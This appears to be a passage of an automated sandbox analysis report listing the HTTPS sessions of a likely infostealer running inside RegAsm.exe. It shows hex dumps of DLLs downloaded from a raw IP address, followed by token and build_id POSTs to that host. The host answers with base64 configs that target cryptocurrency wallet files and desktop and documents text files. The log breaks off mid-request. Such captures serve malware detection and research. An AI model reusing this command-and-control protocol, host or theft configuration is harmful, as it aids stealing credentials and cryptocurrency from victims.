                                                                                                                                                                                                                                                            Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                                                                                                                                                                                                            2024-04-29 20:13:29 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                                                                                                                                                                                                            Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                                                                                                                                                                                                            2024-04-29 20:13:29 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                                                                                                                                                                                                            Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                                                                                                                                                                                                            2024-04-29 20:13:29 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                                                                                                                                                                                                            Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                                                                                                                                                                                                            2024-04-29 20:13:29 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                                                                                                                                                                                                            Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                                                                                                                                                                                                            2024-04-29 20:13:29 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                                                                                                                                                                                                            Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                                                                                                                                                                                                            2024-04-29 20:13:29 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                                                                                                                                                                                                            Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            26192.168.2.44977095.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:30 UTC226OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:31 UTC245INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:30 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 80880
                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            ETag: "6315a9f4-13bf0"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            2024-04-29 20:13:31 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                                                                                            2024-04-29 20:13:31 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                                                                                                                                                                                                            Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                                                                                                                                                                                                            2024-04-29 20:13:31 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                                                                                                                                                                                                            Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                                                                                                                                                                                                                            2024-04-29 20:13:31 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                                                                                                                                                                                                            Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                                                                                                                                                                                                            2024-04-29 20:13:31 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                                                                                                                                                                                                            Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            27192.168.2.44977195.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:32 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EBGCGHIDHCBFHIDGHCBK
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:32 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 43 42 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------EBGCGHIDHCBFHIDGHCBKContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------EBGCGHIDHCBFHIDGHCBKContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------EBGCGHIDHCBFHIDGHCBKCont
                                                                                                                                                                                                                                                            2024-04-29 20:13:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:33 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:33 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                            Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            28192.168.2.44977295.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:33 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KEHDBAEGIIIEBGCAAFHI
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:33 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------KEHDBAEGIIIEBGCAAFHICont
                                                                                                                                                                                                                                                            2024-04-29 20:13:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:34 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:34 UTC131INData Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            29192.168.2.44977395.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:35 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KJEGDBKFIJDAKFIDGHJE
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Content-Length: 453
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:35 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------KJEGDBKFIJDAKFIDGHJEContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------KJEGDBKFIJDAKFIDGHJEContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------KJEGDBKFIJDAKFIDGHJECont
                                                                                                                                                                                                                                                            2024-04-29 20:13:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:35 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:35 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            30192.168.2.44977495.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:37 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBG
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
